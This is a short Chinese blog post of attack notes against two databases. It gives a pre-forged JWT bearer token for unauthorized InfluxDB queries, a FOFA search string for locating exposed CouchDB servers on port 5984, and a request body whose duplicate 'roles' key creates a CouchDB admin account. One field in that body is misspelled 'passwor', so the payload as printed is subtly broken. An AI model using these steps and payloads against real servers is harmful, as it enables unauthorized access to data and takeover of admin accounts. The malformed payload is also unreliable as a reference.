本文已参与「新人创作礼」活动,一起开启掘金创作之路。
Influxdb-未授权访问
默认端口:8086 8088
借助jwt.io/来生成jwt token:
登录的时候抓个包
然后在数据中添加一个部分
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJpYXQiOjE2NzEyNTIxMjN9.Y9i99OpSWOInZqmBpQAvr2ymmsWG2dZZDYkz9RzrCk0
这时候就可以查数据了
CouchDB-权限绕过
FOFA可以怎么去试试
对应版本最好不要高于1.7.0
"CouchDB" && port="5984"
未授权的
在地址后面加上
_utils/#
还要另外一个是需要抓数据包的
数据包中需要添加两个东西
/_users/org.couchdb.user:vulhub
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"passwor": "123456"
}
当我们发送数据包,可以看见一个OK的时候啊
就可能用户添加成功了
你就可以尝试去登录一下
